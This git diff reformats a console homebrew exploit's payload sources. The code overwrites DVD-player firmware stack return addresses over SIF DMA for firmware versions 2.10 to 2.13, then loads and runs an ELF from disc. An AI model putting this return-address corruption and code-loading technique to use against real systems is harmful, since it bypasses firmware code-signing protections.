+IOP_ORIGINAL_RETURN_ADDRESS_210 = 0x5ED30 # 0xB3630 + 0x5C700 - 0xB1000 +IOP_ORIGINAL_RETURN_ADDRESS_212 = 0x5ECD8 # 0xB35D8 + 0x5C700 - 0xB1000 +IOP_ORIGINAL_RETURN_ADDRESS_213 = 0x5E8EC # 0xB31EC + 0x5C700 - 0xB1000 +IOP_RETURN_ADDRESS_LOCATION_210 = 0x1F30AC # 0x1F62AC + 0x1F3058 - 0x1F6258 +IOP_RETURN_ADDRESS_LOCATION_212 = 0x1F30B4 # 0x1F62B4 + 0x1F3058 - 0x1F6258 +IOP_RETURN_ADDRESS_LOCATION_213 = 0x1F30B4 # 0x1F62B4 + 0x1F3058 - 0x1F6258 -#IOP_PAYLOAD_ENTRY = `$(IOP_OBJDUMP) -t ioppayload.iop.elf | grep " _start"` -IOP_PAYLOAD_ENTRY = 0xa00fd178 # Set this manually for now. +# IOP_PAYLOAD_ENTRY = `$(IOP_OBJDUMP) -t ioppayload.iop.elf | grep " _start"` +IOP_PAYLOAD_ENTRY = 0xA00FD178 # Set this manually for now. +# AKuHAK: check why iop-objdump shows completely different address? 401fa178 not A00FD178 -IOP_PAYLOAD_ADDRESS = 0xa00fd000 +IOP_PAYLOAD_ADDRESS = 0xA00FD000 -EE_PAYLOAD_ADDRESS = 0x01fff800 +EE_PAYLOAD_ADDRESS = 0x01FFF800 -#isoinfo -l -i dvd.iso | grep "BOOT.ELF" -#var=`isoinfo -l -i dvd.iso | grep "BOOT.ELF" | grep -o -P "[0-9]*? -"` -# LOAD_ELF_FROM_OFFSET = +# isoinfo -l -i dvd.iso | grep "BOOT.ELF" +# var=`isoinfo -l -i dvd.iso | grep "BOOT.ELF" | grep -o -P "[0-9]*? -"` +# LOAD_ELF_FROM_OFFSET = +# LOAD_ELF_FROM_OFFSET = `isoinfo -l -i $(ISO_NAME) | grep BOOT.ELF | awk '{print $10*2048}'` LOAD_ELF_FROM_OFFSET = 0x5BB000 # Set this manually for now include Mainrules.mk diff --git a/PAYLOADS/1.00-2.13/ioppayload.iop.c b/PAYLOADS/1.00-2.13/ioppayload.iop.c index 7a7d8f5..56d707f 100644 --- a/PAYLOADS/1.00-2.13/ioppayload.iop.c +++ b/PAYLOADS/1.00-2.13/ioppayload.iop.c @@ -2,17 +2,18 @@ /* Todo: seperate these settings to an include file. */ -#define EE_CRT0_ADDRESS ((void*)0x21FFF800) -#define EE_WAIT_ADDRESS ((void*)0x01FFF7F0) +#define EE_CRT0_ADDRESS ((void *)0x21FFF800) +#define EE_WAIT_ADDRESS ((void *)0x01FFF7F0) #define EE_ENTRYPOINT_ADDRESS ((void *)0x01FFF7E0) -//#define EE_DEBUG_ADDRESS ((void *)0x01FFF7D0) +// #define EE_DEBUG_ADDRESS ((void *)0x01FFF7D0) -struct SifDmaTransfer { - void *src, - *dest; - int size; - int attr; -} __attribute__ ((aligned(8))); +struct SifDmaTransfer +{ + void *src, + *dest; + int size; + int attr; +} __attribute__((aligned(8))); #define ELF_PT_LOAD 1 @@ -21,32 +22,34 @@ typedef unsigned short u16; typedef unsigned int u32; typedef unsigned int size_t; -typedef struct { - u8 ident[16]; - u16 type; - u16 machine; - u32 version; - u32 entry; - u32 phoff; - u32 shoff; - u32 flags; - u16 ehsize; - u16 phentsize; - u16 phnum; - u16 shentsize; - u16 shnum; - u16 shstrndx; +typedef struct +{ + u8 ident[16]; + u16 type; + u16 machine; + u32 version; + u32 entry; + u32 phoff; + u32 shoff; + u32 flags; + u16 ehsize; + u16 phentsize; + u16 phnum; + u16 shentsize; + u16 shnum; + u16 shstrndx; } elf_header_t; -typedef struct { - u32 type; - u32 offset; - void *vaddr; - u32 paddr; - u32 filesz; - u32 memsz; - u32 flags; - u32 align; +typedef struct +{ + u32 type; + u32 offset; + void *vaddr; + u32 paddr; + u32 filesz; + u32 memsz; + u32 flags; + u32 align; } elf_pheader_t; #define SECTOR_SIZE 0x800 @@ -55,12 +58,12 @@ typedef struct { int (*readSectors)(int count, int sector, void *destination); -//int (*sceSifSetDma)(struct SifDmaTransfer *, int num) = (void *)0x16fc8; -//int (*sceSifDmaStat)(int trid) = (void *)0x17170; -//void (*flushIcache)(void) = (void*)0x2f40; -//void (*flushDcache)(void) = (void*)0x3044; -//void (*printf)(char *, ...) = (void *)0x1ab84; // 2.10 -//void (*printf)(char *, ...) = (void *)0x155f8; // 2.12 +// int (*sceSifSetDma)(struct SifDmaTransfer *, int num) = (void *)0x16fc8; +// int (*sceSifDmaStat)(int trid) = (void *)0x17170; +// void (*flushIcache)(void) = (void *)0x2f40; +// void (*flushDcache)(void) = (void *)0x3044; +// void (*printf)(char *, ...) = (void *)0x1ab84; // 2.10 +// void (*printf)(char *, ...) = (void *)0x155f8; // 2.12 int (*sceSifSetDma)(struct SifDmaTransfer *, int num); int (*sceSifDmaStat)(int trid); @@ -70,215 +73,224 @@ static void *memcpy(void *dest, void *src, unsigned int n); static void *memset(void *s, int c, unsigned int n); static void memset_ee(void *s, int c, unsigned int n); -//#include "iopresolve.h" +// #include "iopresolve.h" -#define BD2 (*(volatile int *)0xBD000020) //msflag +#define BD2 (*(volatile int *)0xBD000020) // msflag -static void readData(void *dest, unsigned int offset, size_t n) { - //unsigned char buffer[SECTOR_SIZE]; - //unsigned char *buffer = (void *)0xfd000; - unsigned char *buffer = (void *)0xba000; // single +static int SifGetMSFlag() +{ + int a, b; - unsigned int copied = 0; - #define remaining (n - copied) + b = BD2; + do { + a = b; + b = BD2; + } while (a != b); - if(offset % SECTOR_SIZE) { - readSectors(1, offset / SECTOR_SIZE, buffer); - memcpy(dest, buffer + offset % SECTOR_SIZE, min(SECTOR_SIZE - (offset % SECTOR_SIZE), n)); - copied += min(SECTOR_SIZE - (offset % SECTOR_SIZE), n); - } + return a; +} - if(remaining >= SECTOR_SIZE) { - readSectors(remaining / SECTOR_SIZE, (offset + copied) / SECTOR_SIZE, dest + copied); - copied += (remaining / SECTOR_SIZE) * SECTOR_SIZE; - } - - if(remaining > 0) { - readSectors(1, (offset + copied) / SECTOR_SIZE, buffer); - memcpy(dest + copied, buffer, remaining); - } +static int SifSetMSFlag(unsigned int value) +{ + int a, b; + + BD2 = value; + + b = BD2; + do { + a = b; + b = BD2; + } while (a != b); - #undef remaining + return a; +} + +static void readData(void *dest, unsigned int offset, size_t n) +{ + // unsigned char buffer[SECTOR_SIZE]; + // unsigned char *buffer = (void *)0xfd000; + unsigned char *buffer = (void *)0xba000; // single + + unsigned int copied = 0; +#define remaining (n - copied) + + if (offset % SECTOR_SIZE) { + readSectors(1, offset / SECTOR_SIZE, buffer); + memcpy(dest, buffer + offset % SECTOR_SIZE, min(SECTOR_SIZE - (offset % SECTOR_SIZE), n)); + copied += min(SECTOR_SIZE - (offset % SECTOR_SIZE), n); + } + + if (remaining >= SECTOR_SIZE) { + readSectors(remaining / SECTOR_SIZE, (offset + copied) / SECTOR_SIZE, dest + copied); + copied += (remaining / SECTOR_SIZE) * SECTOR_SIZE; + } + + if (remaining > 0) { + readSectors(1, (offset + copied) / SECTOR_SIZE, buffer); + memcpy(dest + copied, buffer, remaining); + } + +#undef remaining } // Read data but don't care about over/under writing to dest -static void readDataUnsafe(void *dest, unsigned int offset, size_t n) { - unsigned int sectorAlignedOffset = offset & ~(SECTOR_SIZE - 1); - unsigned int underflow = offset - sectorAlignedOffset; +static void readDataUnsafe(void *dest, unsigned int offset, size_t n) +{ + unsigned int sectorAlignedOffset = offset & ~(SECTOR_SIZE - 1); + unsigned int underflow = offset - sectorAlignedOffset; - readSectors((n + underflow + SECTOR_SIZE - 1) / SECTOR_SIZE, sectorAlignedOffset / SECTOR_SIZE, dest - underflow); + readSectors((n + underflow + SECTOR_SIZE - 1) / SECTOR_SIZE, sectorAlignedOffset / SECTOR_SIZE, dest - underflow); } -void _start(void) { - extern unsigned char ee_crt0[]; - extern unsigned int ee_crt0_size; - void *return_address[4] __attribute__ ((aligned (16))) = { EE_CRT0_ADDRESS, 0, 0, 0 }; - int one __attribute__ ((aligned (16))) = 1; - int i; - - //sceSifSetDma = resolve("sifman", 7); - //sceSifDmaStat = resolve("sifman", 8); - - sceSifSetDma = (void *)0x16fc8; - sceSifDmaStat = (void *)0x17170; - - unsigned int addiu_magic = 0x27bdffc8; // addiu $sp, $sp, -0x38 - //if(*(unsigned int *)READ_SECTORS_110 == addiu_magic) readSectors = (void *)READ_SECTORS_110; - if(*(unsigned int *)READ_SECTORS_210 == addiu_magic) readSectors = (void *)READ_SECTORS_210; - else if(*(unsigned int *)READ_SECTORS_212 == addiu_magic) readSectors = (void *)READ_SECTORS_212; - else if(*(unsigned int *)READ_SECTORS_213 == addiu_magic) readSectors = (void *)READ_SECTORS_213; - - transfer_to_ee(EE_CRT0_ADDRESS, ee_crt0, ee_crt0_size); - - // Corrupt all known return addresses in the stack, there might be a more universal way for IOP to redirect EE... - transfer_to_ee((void *)0x14A5FF0, &return_address, sizeof(return_address)); // 2.10E/A - transfer_to_ee((void *)0x10007F0, &return_address, sizeof(return_address)); // 2.10J - transfer_to_ee((void *)0x12D1C70, &return_address, sizeof(return_address)); // 2.10U - - transfer_to_ee((void *)0x12B8CF0, &return_address, sizeof(return_address)); // 2.12U - transfer_to_ee((void *)0x148D0F0, &return_address, sizeof(return_address)); // 2.12G - transfer_to_ee((void *)0xFE5FF0, &return_address, sizeof(return_address)); // 2.12J - - transfer_to_ee((void *)0x01477B80, &return_address, sizeof(return_address)); // 2.13E/A - - // Clear bit 0 of 0x208bb710 to make EE exit loop waiting for IOP, and return to our above payload - unsigned int loopValue = 0x010004; - //transfer_to_ee((void *)0x208bb710, &loopValue, sizeof(loopValue)); // 2.10E - transfer_to_ee((void *)0x2087d110, &loopValue, sizeof(loopValue)); // 2.13E - - // We wait for EE side to be ready before sending ELF. - while(!(SifGetMSFlag() & 1)); - SifSetMSFlag(3); - - //unsigned char *buffer = (void *)0xfe000; - unsigned char *buffer = (void *)0xBB800; - size_t sizeofbuffer = 2 * SECTOR_SIZE; // todo: find a nice large space 4 sectors maybe - - elf_header_t eh; - readData(&eh, LOAD_ELF_FROM_OFFSET, sizeof(elf_header_t)); - - elf_pheader_t eph[eh.phnum]; - readData(&eph, LOAD_ELF_FROM_OFFSET + eh.phoff, sizeof(elf_pheader_t) * eh.phnum); - - for (i = 0; i < eh.phnum; i++) { - if (eph[i].type != ELF_PT_LOAD) - continue; - - // TODO: handle non-16byte aligned transfers - - unsigned int copied = 0; - int remaining = eph[i].filesz; - while(remaining > 0) { - unsigned int k = min(remaining, sizeofbuffer); - k = (k + 0xf) & ~0xf; - - // If offset is not aligned to a sector, start with a smaller transfer to get it aligned for future reads - if((eph[i].offset + copied) & (SECTOR_SIZE - 1)) k = SECTOR_SIZE - (eph[i].offset + copied) & (SECTOR_SIZE - 1); - - //readData(buffer, LOAD_ELF_FROM_OFFSET + eph[i].offset + copied, k); - readDataUnsafe(buffer, LOAD_ELF_FROM_OFFSET + eph[i].offset + copied, k); - - transfer_to_ee(eph[i].vaddr + copied, buffer, k); - copied += k; - remaining -= k; - } - - copied = 0; - remaining = eph[i].memsz - eph[i].filesz; - - if(remaining > 0) { - // First transfer needs to respect if load size isn't multiple of 16 bytes and not memset 0 over the final eph[i].filesz % 16 bytes - if(eph[i].filesz % 16) { - readData(buffer, LOAD_ELF_FROM_OFFSET + eph[i].offset + eph[i].filesz - (eph[i].filesz % 16), eph[i].filesz % 16); - memset(buffer + (eph[i].filesz % 16), 0, 16 - (eph[i].filesz % 16)); - transfer_to_ee(eph[i].vaddr + eph[i].filesz - (eph[i].filesz % 16), buffer, 16); - - copied += 16 - (eph[i].filesz % 16); - remaining -= 16 - (eph[i].filesz % 16); - } - - memset(buffer, 0, sizeofbuffer); - } - while(remaining > 0) { - unsigned int k = min(remaining, sizeofbuffer); - k = (k + 0xf) & ~0xf; - - transfer_to_ee(eph[i].vaddr + eph[i].filesz + copied, buffer, k); - copied += k; - remaining -= k; - } - } - - transfer_to_ee(EE_ENTRYPOINT_ADDRESS, &eh.entry, sizeof(one)); - - // Signal EE that the ELF is loaded and ready to execute. - transfer_to_ee(EE_WAIT_ADDRESS, &one, sizeof(one)); - - //int loopValueJ = 0; - //transfer_to_ee((void *)0x205ea210, &loopValueJ, sizeof(loopValueJ)); // 2.10J +void _start(void) +{ + extern unsigned char ee_crt0[]; + extern unsigned int ee_crt0_size; + void *return_address[4] __attribute__((aligned(16))) = {EE_CRT0_ADDRESS, 0, 0, 0}; + int one __attribute__((aligned(16))) = 1; + int i; + + // sceSifSetDma = resolve("sifman", 7); + // sceSifDmaStat = resolve("sifman", 8); + + sceSifSetDma = (void *)0x16fc8; + sceSifDmaStat = (void *)0x17170; + + unsigned int addiu_magic = 0x27bdffc8; // addiu $sp, $sp, -0x38 + // if (*(unsigned int *)READ_SECTORS_110 == addiu_magic) + // readSectors = (void *)READ_SECTORS_110; + if (*(unsigned int *)READ_SECTORS_210 == addiu_magic) + readSectors = (void *)READ_SECTORS_210; + else if (*(unsigned int *)READ_SECTORS_212 == addiu_magic) + readSectors = (void *)READ_SECTORS_212; + else if (*(unsigned int *)READ_SECTORS_213 == addiu_magic) + readSectors = (void *)READ_SECTORS_213; + + transfer_to_ee(EE_CRT0_ADDRESS, ee_crt0, ee_crt0_size); + + // Corrupt all known return addresses in the stack, there might be a more universal way for IOP to redirect EE... + transfer_to_ee((void *)0x14A5FF0, &return_address, sizeof(return_address)); // 2.10E/A + transfer_to_ee((void *)0x10007F0, &return_address, sizeof(return_address)); // 2.10J + transfer_to_ee((void *)0x12D1C70, &return_address, sizeof(return_address)); // 2.10U + + transfer_to_ee((void *)0x12B8CF0, &return_address, sizeof(return_address)); // 2.12U + transfer_to_ee((void *)0x148D0F0, &return_address, sizeof(return_address)); // 2.12G + transfer_to_ee((void *)0x0FE5FF0, &return_address, sizeof(return_address)); // 2.12J + + transfer_to_ee((void *)0x1477B80, &return_address, sizeof(return_address)); // 2.13E/A + + // Clear bit 0 of 0x208bb710 to make EE exit loop waiting for IOP, and return to our above payload + unsigned int loopValue = 0x010004; + // transfer_to_ee((void *)0x208bb710, &loopValue, sizeof(loopValue)); // 2.10E + transfer_to_ee((void *)0x2087d110, &loopValue, sizeof(loopValue)); // 2.13E + + // We wait for EE side to be ready before sending ELF. + while (!(SifGetMSFlag() & 1)) + ; + SifSetMSFlag(3); + + // unsigned char *buffer = (void *)0xfe000; + unsigned char *buffer = (void *)0xBB800; + size_t sizeofbuffer = 2 * SECTOR_SIZE; // todo: find a nice large space 4 sectors maybe + + elf_header_t eh; + readData(&eh, LOAD_ELF_FROM_OFFSET, sizeof(elf_header_t)); + + elf_pheader_t eph[eh.phnum]; + readData(&eph, LOAD_ELF_FROM_OFFSET + eh.phoff, sizeof(elf_pheader_t) * eh.phnum); + + for (i = 0; i < eh.phnum; i++) { + if (eph[i].type != ELF_PT_LOAD) + continue; + + // TODO: handle non-16byte aligned transfers + + unsigned int copied = 0; + int remaining = eph[i].filesz; + while (remaining > 0) { + unsigned int k = min(remaining, sizeofbuffer); + k = (k + 0xf) & ~0xf; + + // If offset is not aligned to a sector, start with a smaller transfer to get it aligned for future reads + if ((eph[i].offset + copied) & (SECTOR_SIZE - 1)) + k = SECTOR_SIZE - (eph[i].offset + copied) & (SECTOR_SIZE - 1); + + // readData(buffer, LOAD_ELF_FROM_OFFSET + eph[i].offset + copied, k); + readDataUnsafe(buffer, LOAD_ELF_FROM_OFFSET + eph[i].offset + copied, k); + + transfer_to_ee(eph[i].vaddr + copied, buffer, k); + copied += k; + remaining -= k; + } + + copied = 0; + remaining = eph[i].memsz - eph[i].filesz; + + if (remaining > 0) { + // First transfer needs to respect if load size isn't multiple of 16 bytes and not memset 0 over the final eph[i].filesz % 16 bytes + if (eph[i].filesz % 16) { + readData(buffer, LOAD_ELF_FROM_OFFSET + eph[i].offset + eph[i].filesz - (eph[i].filesz % 16), eph[i].filesz % 16); + memset(buffer + (eph[i].filesz % 16), 0, 16 - (eph[i].filesz % 16)); + transfer_to_ee(eph[i].vaddr + eph[i].filesz - (eph[i].filesz % 16), buffer, 16); + + copied += 16 - (eph[i].filesz % 16); + remaining -= 16 - (eph[i].filesz % 16); + } + + memset(buffer, 0, sizeofbuffer); + } + while (remaining > 0) { + unsigned int k = min(remaining, sizeofbuffer); + k = (k + 0xf) & ~0xf; + + transfer_to_ee(eph[i].vaddr + eph[i].filesz + copied, buffer, k); + copied += k; + remaining -= k; + } + } + + transfer_to_ee(EE_ENTRYPOINT_ADDRESS, &eh.entry, sizeof(one)); + + // Signal EE that the ELF is loaded and ready to execute. + transfer_to_ee(EE_WAIT_ADDRESS, &one, sizeof(one)); + + // int loopValueJ = 0; + // transfer_to_ee((void *)0x205ea210, &loopValueJ, sizeof(loopValueJ)); // 2.10J } /* dest and src should be aligned to 16 byte boundary */ static void transfer_to_ee(void *dest, void *src, unsigned int size) { - int trid; - - size = size & 0x3FFFFFFF; - struct SifDmaTransfer t = { src, dest, size, 0 }; - - /* These could be sent in parallel, but is it really worth it? - */ - trid = sceSifSetDma(&t, 1); - while(sceSifDmaStat(trid) > -1){}; + int trid; + + size = size & 0x3FFFFFFF; + struct SifDmaTransfer t = {src, dest, size, 0}; + + /* These could be sent in parallel, but is it really worth it? + */ + trid = sceSifSetDma(&t, 1); + while (sceSifDmaStat(trid) > -1) {}; } static void *memcpy(void *dest, void *src, unsigned int n) -{ - int i; - - for(i = 0; i < n; i++) - ((unsigned char *)dest)[i] = ((unsigned char *)src)[i]; - - return dest; +{ + int i; + + for (i = 0; i < n; i++) + ((unsigned char *)dest)[i] = ((unsigned char *)src)[i]; + + return dest; } static void *memset(void *s, int c, unsigned int n) { - int i; - - for(i = 0; i < n; i++) - ((unsigned char *)s)[i] = c; - - return s; -} + int i; -static int SifGetMSFlag() -{ - int a, b; - - b = BD2; - do { - a=b; - b=BD2; - } while(a != b); - - return a; -} + for (i = 0; i < n; i++) + ((unsigned char *)s)[i] = c; -static int SifSetMSFlag(unsigned int value) -{ - int a, b; - - BD2 = value; - - b = BD2; - do { - a=b; - b=BD2; - } while(a != b); - - return a; + return s; } asm("\n\ diff --git a/PAYLOADS/1.00-2.13/iopresolve.h b/PAYLOADS/1.00-2.13/iopresolve.h index 6162f3c..9c3bd84 100644 --- a/PAYLOADS/1.00-2.13/iopresolve.h +++ b/PAYLOADS/1.00-2.13/iopresolve.h @@ -1,100 +1,105 @@ -//typedef unsigned char u8; -//typedef unsigned short u16; -//typedef unsigned int u32; +// typedef unsigned char u8; +// typedef unsigned short u16; +// typedef unsigned int u32; typedef void *pointer; #define NULL 0 -typedef struct _smod_mod_info { - //struct _smod_mod_info *next; - pointer next; - /** A pointer to the name in IOP RAM, this must be smem_read(). */ - //char *name; - pointer name; - u16 version; - /** For MODLOAD shipped with games. The old MODLOAD module from boot ROMs do not use a flags field. */ - u16 newflags; - u16 id; - u16 unused; - /** _start */ - u32 entry; - u32 gp; - u32 text_start; - u32 text_size; - u32 data_size; - u32 bss_size; - u32 unused1; - u32 unused2; +typedef struct _smod_mod_info +{ + // struct _smod_mod_info *next; + pointer next; + /** A pointer to the name in IOP RAM, this must be smem_read(). */ + // char *name; + pointer name; + u16 version; + /** For MODLOAD shipped with games. The old MODLOAD module from boot ROMs do not use a flags field. */ + u16 newflags; + u16 id; + u16 unused; + /** _start */ + u32 entry; + u32 gp; + u32 text_start; + u32 text_size; + u32 data_size; + u32 bss_size; + u32 unused1; + u32 unused2; } smod_mod_info_t; -typedef struct _slib_imp_list { - u8 magic; - //struct _slib_imp_list *next; - pointer next; - u16 version; - u16 flags; - u8 name[8]; - //void *imports[0]; - pointer imports[0]; +typedef struct _slib_imp_list +{ + u8 magic; + // struct _slib_imp_list *next; + pointer next; + u16 version; + u16 flags; + u8 name[8]; + // void *imports[0]; + pointer imports[0]; } slib_imp_list_t; -typedef struct _slib_exp_lib { - //struct _slib_exp_lib *prev; - pointer prev; - //struct _slib_imp_list *caller; - pointer caller; - u16 version; - u16 flags; - u8 name[8]; - //void *exports[0]; - pointer exports[0]; +typedef struct _slib_exp_lib +{ + // struct _slib_exp_lib *prev; + pointer prev; + // struct _slib_imp_list *caller; + pointer caller; + u16 version; + u16 flags; + u8 name[8]; + // void *exports[0]; + pointer exports[0]; } slib_exp_lib_t; -typedef struct _slib_exp_lib_list { - //struct _slib_exp_lib *tail; - pointer tail; - //struct _slib_exp_lib *head; - pointer head; +typedef struct _slib_exp_lib_list +{ + // struct _slib_exp_lib *tail; + pointer tail; + // struct _slib_exp_lib *head; + pointer head; } slib_exp_lib_list_t; -#define SMEM_BUF_SIZE 0x300 //Must be large enough to accommodate all operations. +#define SMEM_BUF_SIZE 0x300 // Must be large enough to accommodate all operations. -struct smem_buf { - union { - u8 bytes[SMEM_BUF_SIZE / sizeof(u8)]; - u32 words[SMEM_BUF_SIZE / sizeof(u32)]; - smod_mod_info_t mod_info; - slib_exp_lib_t exp_lib; - }; +struct smem_buf +{ + union + { + u8 bytes[SMEM_BUF_SIZE / sizeof(u8)]; + u32 words[SMEM_BUF_SIZE / sizeof(u32)]; + smod_mod_info_t mod_info; + slib_exp_lib_t exp_lib; + }; }; -size_t strlen(const char *str) { +size_t strlen(const char *str) +{ const char *s; - for (s = str; *s; ++s); + for (s = str; *s; ++s) + ; return (s - str); } -int memcmp(const char *cs_in, const char *ct_in, size_t n) { - size_t i; - const unsigned char * cs = (const unsigned char*) cs_in; - const unsigned char * ct = (const unsigned char*) ct_in; - - for (i = 0; i < n; i++, cs++, ct++) - { - if (*cs < *ct) - { - return -1; - } - else if (*cs > *ct) - { - return 1; +int memcmp(const char *cs_in, const char *ct_in, size_t n) +{ + size_t i; + const unsigned char *cs = (const unsigned char *)cs_in; + const unsigned char *ct = (const unsigned char *)ct_in; + + for (i = 0; i < n; i++, cs++, ct++) { + if (*cs < *ct) { + return -1; + } else if (*cs > *ct) { + return 1; + } } - } - return 0; -} + return 0; +} @@ -104,117 +109,120 @@ struct smem_buf smem_buf; typedef unsigned int SifRpcReceiveData_t; -size_t SifRpcGetOtherData(void *a, pointer x, void *dest, size_t s, int z) { - memcpy(dest, x, s); - return s; +size_t SifRpcGetOtherData(void *a, pointer x, void *dest, size_t s, int z) +{ + memcpy(dest, x, s); + return s; } -slib_exp_lib_list_t *slib_exp_lib_list(void) { - SifRpcReceiveData_t RData; - slib_exp_lib_t *core_exps; - slib_exp_lib_list_t *exp_lib_list = NULL; - u32 i, addr, core_end, NextMod, *exp_func; - void *pGetLoadcoreInternalData; - smod_mod_info_t *ModInfo; - - /* Read the start of the global module table - this is where we will search. */ - if(SifRpcGetOtherData(&RData, (void*)0x800, &smem_buf, sizeof(smod_mod_info_t), 0)>=0){ - /* The first entry points to LOADCORE's module info. We then use the - module info to determine the end of LOADCORE's .text segment (just - past the export library we're trying to find. */ - NextMod = *smem_buf.words; - if(SifRpcGetOtherData(&RData, (void*)NextMod, &smem_buf, sizeof(smod_mod_info_t), 0)>=0){ - ModInfo = &smem_buf.mod_info; - core_end = ModInfo->text_start+ModInfo->text_size; - - /* Back up so we position ourselves infront of where the export - library will be. */ - if(SifRpcGetOtherData(&RData, (void*)(core_end - 512), &smem_buf, 512, 0)>=0){ - /* Search for LOADCORE's export library. */ - for (i = 0; i < 512; i += 4) { - /* SYSMEM's export library sits at 0x830, so it should appear in - LOADCORE's prev pointer. */ - if (smem_buf.words[i / sizeof(u32)] == 0x830) { - if (!memcmp(smem_buf.bytes + i + 12, "loadcore", 8)) - //if(*(unsigned int *)(smem_buf.bytes + i + 12) == 0x64616f6c) // 6c 6f 61 64 == load - break; - } - } - if (i >= 512) - return NULL; - - /* Get to the start of the export table, and find the address of the - routine that will get us the export library list info. */ - core_exps = (slib_exp_lib_t *)(smem_buf.bytes + i); - pGetLoadcoreInternalData = core_exps->exports[3]; - - if(SifRpcGetOtherData(&RData, pGetLoadcoreInternalData, &smem_buf, 8, 0)>=0){ - exp_func = smem_buf.words; - - /* Parse the two instructions that hold the address of the table. */ - if ((exp_func[0] & 0xffff0000) != 0x3c020000) /* lui v0, XXXX */ - return NULL; - if ((exp_func[1] & 0xffff0000) != 0x24420000) /* addiu v0, v0, XXXX */ - return NULL; - - addr = ((exp_func[0] & 0xffff) << 16) | (exp_func[1] & 0xffff); - - if(SifRpcGetOtherData(&RData, (void*)addr, &smem_buf, 8, 0)>=0){ - _slib_cur_exp_lib_list.tail = (slib_exp_lib_t *)(smem_buf.words[0]); - _slib_cur_exp_lib_list.head = (slib_exp_lib_t *)(smem_buf.words[1]); - exp_lib_list = &_slib_cur_exp_lib_list; - } - } - } - } - } - - return exp_lib_list; +slib_exp_lib_list_t *slib_exp_lib_list(void) +{ + SifRpcReceiveData_t RData; + slib_exp_lib_t *core_exps; + slib_exp_lib_list_t *exp_lib_list = NULL; + u32 i, addr, core_end, NextMod, *exp_func; + void *pGetLoadcoreInternalData; + smod_mod_info_t *ModInfo; + + /* Read the start of the global module table - this is where we will search. */ + if (SifRpcGetOtherData(&RData, (void *)0x800, &smem_buf, sizeof(smod_mod_info_t), 0) >= 0) { + /* The first entry points to LOADCORE's module info. We then use the + module info to determine the end of LOADCORE's .text segment (just + past the export library we're trying to find. */ + NextMod = *smem_buf.words; + if (SifRpcGetOtherData(&RData, (void *)NextMod, &smem_buf, sizeof(smod_mod_info_t), 0) >= 0) { + ModInfo = &smem_buf.mod_info; + core_end = ModInfo->text_start + ModInfo->text_size; + + /* Back up so we position ourselves infront of where the export + library will be. */ + if (SifRpcGetOtherData(&RData, (void *)(core_end - 512), &smem_buf, 512, 0) >= 0) { + /* Search for LOADCORE's export library. */ + for (i = 0; i < 512; i += 4) { + /* SYSMEM's export library sits at 0x830, so it should appear in + LOADCORE's prev pointer. */ + if (smem_buf.words[i / sizeof(u32)] == 0x830) { + if (!memcmp(smem_buf.bytes + i + 12, "loadcore", 8)) + // if (*(unsigned int *)(smem_buf.bytes + i + 12) == 0x64616f6c) // 6c 6f 61 64 == load + break; + } + } + if (i >= 512) + return NULL; + + /* Get to the start of the export table, and find the address of the + routine that will get us the export library list info. */ + core_exps = (slib_exp_lib_t *)(smem_buf.bytes + i); + pGetLoadcoreInternalData = core_exps->exports[3]; + + if (SifRpcGetOtherData(&RData, pGetLoadcoreInternalData, &smem_buf, 8, 0) >= 0) { + exp_func = smem_buf.words; + + /* Parse the two instructions that hold the address of the table. */ + if ((exp_func[0] & 0xffff0000) != 0x3c020000) /* lui v0, XXXX */ + return NULL; + if ((exp_func[1] & 0xffff0000) != 0x24420000) /* addiu v0, v0, XXXX */ + return NULL; + + addr = ((exp_func[0] & 0xffff) << 16) | (exp_func[1] & 0xffff); + + if (SifRpcGetOtherData(&RData, (void *)addr, &smem_buf, 8, 0) >= 0) { + _slib_cur_exp_lib_list.tail = (slib_exp_lib_t *)(smem_buf.words[0]); + _slib_cur_exp_lib_list.head = (slib_exp_lib_t *)(smem_buf.words[1]); + exp_lib_list = &_slib_cur_exp_lib_list; + } + } + } + } + } + + return exp_lib_list; } -#define EXP_LIB_MAX SMEM_BUF_SIZE /* We can even handle CDVDMAN's bloat! */ +#define EXP_LIB_MAX SMEM_BUF_SIZE /* We can even handle CDVDMAN's bloat! */ int slib_get_exp_lib(const char *name, slib_exp_lib_t *library) { - SifRpcReceiveData_t RData; - slib_exp_lib_list_t *exp_lib_list = &_slib_cur_exp_lib_list; - slib_exp_lib_t *exp_lib = &smem_buf.exp_lib; - void *cur_lib; - int len = strlen(name), count = 0; + SifRpcReceiveData_t RData; + slib_exp_lib_list_t *exp_lib_list = &_slib_cur_exp_lib_list; + slib_exp_lib_t *exp_lib = &smem_buf.exp_lib; + void *cur_lib; + int len = strlen(name), count = 0; - if (!exp_lib_list->head && !(exp_lib_list = slib_exp_lib_list())) - return 0; + if (!exp_lib_list->head && !(exp_lib_list = slib_exp_lib_list())) + return 0; - /* Read the tail export library to initiate the search. */ - cur_lib = exp_lib_list->tail; + /* Read the tail export library to initiate the search. */ + cur_lib = exp_lib_list->tail; - while (cur_lib) { - if(SifRpcGetOtherData(&RData, cur_lib, exp_lib, EXP_LIB_MAX, 0)>=0){ - if (!memcmp(exp_lib->name, name, len)) { - while (exp_lib->exports[count] != 0) - count++; + while (cur_lib) { + if (SifRpcGetOtherData(&RData, cur_lib, exp_lib, EXP_LIB_MAX, 0) >= 0) { + if (!memcmp(exp_lib->name, name, len)) { + while (exp_lib->exports[count] != 0) + count++; - if (library) - memcpy(library, exp_lib, sizeof(slib_exp_lib_t) + count * 4); + if (library) + memcpy(library, exp_lib, sizeof(slib_exp_lib_t) + count * 4); - return count; - } + return count; + } - cur_lib = exp_lib->prev; - } - } + cur_lib = exp_lib->prev; + } + } - return 0; + return 0; } -void *resolve(char *name, int export) { - slib_exp_lib_t *modload_lib = (void *)0x100; +void *resolve(char *name, int export) +{ + slib_exp_lib_t *modload_lib = (void *)0x100; - memset(&_slib_cur_exp_lib_list, 0, sizeof(slib_exp_lib_list_t)); + memset(&_slib_cur_exp_lib_list, 0, sizeof(slib_exp_lib_list_t)); - if (!slib_get_exp_lib(name, modload_lib)) { - return NULL; - } + if (!slib_get_exp_lib(name, modload_lib)) { + return NULL; + } - return modload_lib->exports[export]; + return modload_lib->exports[export]; } diff --git a/PAYLOADS/1.00-2.13/stage1_210_212.iop.S b/PAYLOADS/1.00-2.13/stage1_210_212.iop.S index f1c51a1..a4da1a9 100644 --- a/PAYLOADS/1.00-2.13/stage1_210_212.iop.S +++ b/PAYLOADS/1.00-2.13/stage1_210_212.iop.S @@ -3,7 +3,7 @@ flushIcache = 0x00002f40 flushDcache = 0x0003044 -#flushDcacheWrapper = 0x0057f1c +# flushDcacheWrapper = 